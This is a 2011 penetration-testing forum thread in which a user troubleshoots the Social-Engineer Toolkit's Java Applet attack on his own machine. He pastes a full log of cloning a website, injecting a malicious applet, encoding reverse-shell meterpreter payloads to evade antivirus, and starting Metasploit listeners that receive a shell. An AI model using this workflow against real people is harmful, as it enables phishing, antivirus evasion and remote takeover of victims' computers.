[SET] meterpreter wont start after sessions -i

**krtsa91** · 08-11-2011, 06:20 PM

Okey as the title says, I've tried to run java applet attack on my machine for test and it will launch the payload and connects to it but after i put command

Code:

sessions -i 1

it starts the session but it wont load meterpreter. Im using Backtrack 5 KDE/32bit version and SET Version 2.0.3. Everything else works fine and i have updated metasploit and SET too.

Thanks in Andvance.

**sickness** · 08-11-2011, 09:12 PM

Do you even get a message that a session was created ? Paste all output and commands you make.

**krtsa91** · 08-12-2011, 08:51 AM

Originally Posted by sickness

Do you even get a message that a session was created ? Paste all output and commands you make.

yes i get message after session was started.

Code:

root@bt:~# cd /pentest/exploits/set
root@bt:/pentest/exploits/set# 
 Select from the menu:

  1.  Spear-Phishing Attack Vectors
  2.  Website Attack Vectors
  3.  Infectious Media Generator
  4.  Create a Payload and Listener
  5.  Mass Mailer Attack
  6.  Arduino-Based Attack Vector
  7.  SMS Spoofing Attack Vector
  8.  Wireless Access Point Attack Vector
  9.  Third Party Modules
  10. Update the Metasploit Framework
  11. Update the Social-Engineer Toolkit
  12. Help, Credits, and About

  99. Exit the Social-Engineer Toolkit

set > 2

  1. Java Applet Attack Method
  2. Metasploit Browser Exploit Method
  3. Credential Harvester Attack Method
  4. Tabnabbing Attack Method
  5. Man Left in the Middle Attack Method
  6. Web Jacking Attack Method
  7. Multi-Attack Web Method
  8. Create or import a CodeSigning Certificate

  99. Return to the previous menu

set > 1

  1. Web Templates
  2. Site Cloner
  3. Custom Import

set > 2

 SET supports both HTTP and HTTPS
 Example: http://www.thisisafakesite.com
 Enter the url to clone: http://google.com
[*] Cloning the website: http://google.com                                                                 [*] This could take a little bit...                                                                        [*] Injecting Java Applet attack into the newly cloned website.[*] Filename obfuscation complete. Payload name is: b8zvHv0[*] Malicious java applet website prepped for deployment                                                   
                                                                                                           

What payload do you want to generate:

  Name:                                       Description:

    1.  Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker
    2.  Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker
    3.  Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker
    4.  Windows Bind Shell                      Execute payload and create an accepting port on remote system
    5.  Windows Bind Shell X64                  Windows x64 Command Shell, Bind TCP Inline
    6.  Windows Shell Reverse_TCP X64           Windows X64 Command Shell, Reverse TCP Inline
    7.  Windows Meterpreter Reverse_TCP X64     Connect back to the attacker (Windows x64), Meterpreter
    8.  Windows Meterpreter Egress Buster       Spawn a meterpreter shell and find a port home via multiple ports
    9.  Windows Meterpreter Reverse HTTPS       Tunnel communication over HTTP using SSL and use Meterpreter
    10. Windows Meterpreter Reverse DNS         Use a hostname instead of an IP address and spawn Meterpreter
    11. SE Toolkit Interactive Shell            This is the new custom interactive reverse shell designed for SET
    12. RATTE HTTP Tunneling Payload            This is a security bypass payload that will tunnel all comms over HTTP
    13. Import your own executable              Specify a path for your own executable

set > payloads > 2

Select one of the below, 'backdoored executable' is typically the best.

    1.  avoid_utf8_tolower (Normal)
    2.  shikata_ga_nai (Very Good)
    3.  alpha_mixed (Normal)
    4.  alpha_upper (Normal)
    5.  call4_dword_xor (Normal)
    6.  countdown (Normal)
    7.  fnstenv_mov (Normal)
    8.  jmp_call_additive (Normal)
    9.  nonalpha (Normal)
    10. nonupper (Normal)
    11. unicode_mixed (Normal)
    12. unicode_upper (Normal)
    13. alpha2 (Normal)
    14. No Encoding (None)
    15. Multi-Encoder (Excellent)
    16. Backdoored Executable (BEST)

set > encoders> 2

[-] Enter the PORT of the listener (enter for default):  (i use default)

[-] Encoding the payload 4 times to get around pesky Anti-Virus. [-]
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)

   ********************************************************
   Do you want to create a Linux/OSX reverse_tcp meterpreter 
   payload in the Java Applet attack as well?
   ********************************************************

   Enter choice yes or no:  yes
Enter the port to listen for on OSX (enter for default): (using default)
Enter the port to listen for on Linux (enter for default): (using default)

Created by msfpayload (http://www.metasploit.com).
Payload: osx/x86/shell_reverse_tcp
 Length: 65
Options: {"LHOST"=>"192.168.100.38", "LPORT"=>"8080"}
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/meterpreter/reverse_tcp
 Length: 50
Options: {"LHOST"=>"192.168.100.38", "LPORT"=>"8081"}
                                                            
***************************************************                                                        
Web Server Launched. Welcome to the SET Web Attack.                                                        
***************************************************                                                        
                                                                                                           
[--] Tested on IE6, IE7, IE8, IE9, Safari, Opera, Chrome, and FireFox [--]                                 
[*] Launching MSF Listener...                                                                              [*] This may take a few to load MSF...                                                                     
[-] ***
[-] * WARNING: Database support has been disabled
[-] ***

                                                                                                           
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM



       =[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ -- --=[ 721 exploits - 362 auxiliary - 73 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
       =[ svn r13521 updated today (2011.08.11)

resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j[*] Exploit running as background job.
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD osx/x86/shell_reverse_tcp
PAYLOAD => osx/x86/shell_reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 192.168.100.38
LHOST => 192.168.100.38
resource (src/program_junk/meta_config)> set LPORT 8080
LPORT => 8080
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j[*] Exploit running as background job.
resource (src/program_junk/meta_config)> use exploit/multi/handler[*] Started reverse handler on 0.0.0.0:443 [*] Starting the payload handler...
resource (src/program_junk/meta_config)> set PAYLOAD linux/x86/shell/reverse_tcp
PAYLOAD => linux/x86/shell/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 192.168.100.38
LHOST => 192.168.100.38[*] Started reverse handler on 192.168.100.38:8080 
resource (src/program_junk/meta_config)> set LPORT 8081[*] Starting the payload handler...
LPORT => 8081
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j[*] Exploit running as background job.
msf  exploit(handler) > [*] Started reverse handler on 192.168.100.38:8081 [*] Starting the payload handler...[*] Sending stage (36 bytes) to 192.168.100.38[*] Command shell session 1 opened (192.168.100.38:8081 -> 192.168.100.38:50962) at 2011-08-12 11:54:59 +0300

and no sign of meterpreter..

**2901119** · 08-12-2011, 03:38 PM

Are you attacking a linux victim? If so just try typing "ls". Sometimes when you get a session on a linux host it seems like nothing happened. try typing a couple commands and see if you get any output.

**krtsa91** · 08-12-2011, 04:34 PM

Originally Posted by 2901119

Are you attacking a linux victim? If so just try typing "ls". Sometimes when you get a session on a linux host it seems like nothing happened. try typing a couple commands and see if you get any output.

getting this with ls

Code:

Desktop
Downloads
Makefile
Makefile-CYGWIN
Makefile-Linux
NVIDIA-Linux-x86-195.36.24-pkg1.run
NVIDIA-Linux-x86-275.21.run
Offsec101 - 1of3.swf
Offsec101 - 2of3.swf
Offsec101 - 3of3.swf
Offsec101.part1.rar
Offsec101.part2.rar
Offsec101.part3.rar
Offsec101.part4.rar
Offsec101.part5.rar
Offsec101.part6.rar
Offsec101.part7.rar
airoscript
airoscript-ng
airoscript-ng_1.2-2_all.deb
airoscript-ng_1.2-3_all.deb
airoscript_ng-1.2-2.tar.gz
alsa-driver-1.0.9
alsa-driver-1.0.9.tar.bz2
doc
flashplayer11_b1_install_lin_32_071311.tar.gz
install_flash_player_10_linux.tar.gz
offensive-security-labs.pdf
output-01.kismet.netxml
output-02.cap
output-03.cap
output-04.cap
output-04.csv
output-04.kismet.csv
output-04.kismet.netxml
output-05.cap
output-05.csv
output-05.kismet.csv
output-05.kismet.netxml
src
usr
vlc-0.9.9a
vlc-1.1.9
vulnscanout

**2901119** · 08-22-2011, 08:22 AM

so I'd say that solves your problem right? as you can see even though you dont get the fancy "METERPRETER>" prompt you can still communicate with the remote computer that you have a shell on.

**LongHardWood** · 08-23-2011, 03:53 PM

If you are attacking a linux box, you have to use either a linux meterpreter or metsvc payload to get a meterpreter shell. Neither of these payloads are available in SET unfortunately...

**Lancha** · 12-18-2012, 10:12 AM

in my set say support to database is disable how i enable it
and i have the same problem
how i solve it

BackTrack Linux - Penetration Testing Distribution

Thread: [SET] meterpreter wont start after sessions -i

Thread Tools

Search Thread

Display

[SET] meterpreter wont start after sessions -i

Re: [SET] meterpreter wont start after sessions -i

Re: [SET] meterpreter wont start after sessions -i

Re: [SET] meterpreter wont start after sessions -i

Re: [SET] meterpreter wont start after sessions -i

Re: [SET] meterpreter wont start after sessions -i

Re: [SET] meterpreter wont start after sessions -i

Re: [SET] meterpreter wont start after sessions -i

Similar Threads

how to start meterpreter from a windows/shell/reverse session

Wicd Wont start

start network wont work as diff user

It just wont start

Fast Track Meterpreter sessions

Posting Permissions